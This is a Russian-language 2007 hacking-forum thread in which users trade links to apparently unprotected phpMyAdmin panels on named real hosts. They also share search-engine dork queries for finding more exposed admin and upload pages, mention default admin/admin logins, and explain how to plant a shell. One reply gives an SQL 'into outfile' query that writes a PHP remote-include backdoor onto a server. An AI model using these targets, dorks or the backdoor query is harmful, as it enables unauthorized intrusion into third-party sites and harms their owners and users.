ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Сайты с открытыми админками
  #1  
Старый 09.05.2007, 14:28
Аватар для mr.The
mr.The
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,206
Провел на форуме:
4778940

Репутация: 1257


Отправить сообщение для mr.The с помощью ICQ
Lightbulb Сайты с открытыми админками

Ненашел похожей темы и решл создать. есть сайты админы которых полные ламеры и незащищают админки паролями. Предлагаю в этой теме давать ссылки на на сайты этих типов.

Цитата:
http://85.114.241.23/phpmyadmin/server_status.php?lang=ru-win1251&server=1
Цитата:
http://mazdie.tushino.com/phpMyAdmin/main.php?lang=ru-win1251&server=1
 
Ответить с цитированием

  #2  
Старый 09.05.2007, 14:38
Аватар для Ksander
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

inurl:/phpMyAdmin/main.php

Вот тебе и список.
 
Ответить с цитированием

  #3  
Старый 09.05.2007, 14:50
Аватар для mr.The
mr.The
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,206
Провел на форуме:
4778940

Репутация: 1257


Отправить сообщение для mr.The с помощью ICQ
По умолчанию

Цитата:
inurl:/phpMyAdmin/main.php

Вот тебе и список.
невсегда так.
иногда нужны более извращённые методы
 
Ответить с цитированием

  #4  
Старый 09.05.2007, 16:37
Аватар для Zitt
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100

Репутация: 773


Отправить сообщение для Zitt с помощью ICQ
По умолчанию

inurl:main.php Welcome to phpMyAdmin
 
Ответить с цитированием

  #5  
Старый 09.05.2007, 17:39
Аватар для fly
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


Отправить сообщение для fly с помощью ICQ
По умолчанию

Можно попробовать поискать /Ftp и /uploads , например, бывает что есть обычная html страничка с формой для отправки файла на сервер. Способ 2 нахождения админки( 5-8%)
По дефолту стоит пароль и логин admin и т.п. Ну и оськомерц там вроде админка иногда без пасса или .htpasswd. Запрос для upload filetype:html inurl:uploads site:com!
 
Ответить с цитированием

  #6  
Старый 14.05.2007, 09:03
Аватар для BromTyZ
BromTyZ
Новичок
Регистрация: 18.03.2007
Сообщений: 7
Провел на форуме:
8393

Репутация: 8
По умолчанию

http://forum.antichat.ru/thread40031.html
Заходим суда, тут сканер таких дир!
 
Ответить с цитированием

  #7  
Старый 14.05.2007, 20:00
Аватар для PahaN33
PahaN33
Новичок
Регистрация: 05.04.2007
Сообщений: 11
Провел на форуме:
108220

Репутация: 0
По умолчанию

обьясните новичку, как через пхпмуадмин, заливать файлы, на сервер... ((( оч прошу помогите

Последний раз редактировалось _Pantera_; 14.05.2007 в 22:54..
 
Ответить с цитированием

  #8  
Старый 15.05.2007, 00:24
Аватар для fly
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


Отправить сообщение для fly с помощью ICQ
По умолчанию

Вообще долго рассказывать, но например есть у тебя доступ в phpmyadmin(если есть базы). Изучаешь структуру баз(залей дамп всей или части базы на хард), затем можно просто либо проинклудить определенный параметр в таблицы определенной базы (смотри тему phpbb) либо создать файл(твой шелл), также если данная база, которую ты решил изучить имеет характер Скрипт-Галерея или какой-либо upload файлов различных расширений , что мешает добавить тот же *.php формат, дело вкуса! Удачи!
 
Ответить с цитированием

  #9  
Старый 15.05.2007, 00:40
Аватар для p-range
p-range
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524

Репутация: 715
Отправить сообщение для p-range с помощью ICQ
По умолчанию

Цитата:
обьясните новичку, как через пхпмуадмин, заливать файлы, на сервер... ((( оч прошу помогите
если есть права, выполняй запрос:
Код:
select '<?include($_GET[bravo])?>' from table into outfile '/patch/to/file.php';
 
Ответить с цитированием

  #10  
Старый 17.05.2007, 21:45
Аватар для PahaN33
PahaN33
Новичок
Регистрация: 05.04.2007
Сообщений: 11
Провел на форуме:
108220

Репутация: 0
По умолчанию

2 p-range

блин запрос выполняеться, но пишет что неможет создать файл.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Сайты зомби Micr0b Уязвимости 25 20.07.2007 18:36
Сайты российских компаний признаны худшими в Европе -Concord- Мировые новости 10 29.11.2006 04:56
Опасные сайты Dracula4ever Мировые новости 2 28.05.2006 16:11
В 2005 году число dDoS-атак на web сайты возросло на 679% dinar_007 Мировые новости 0 02.03.2006 19:47



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ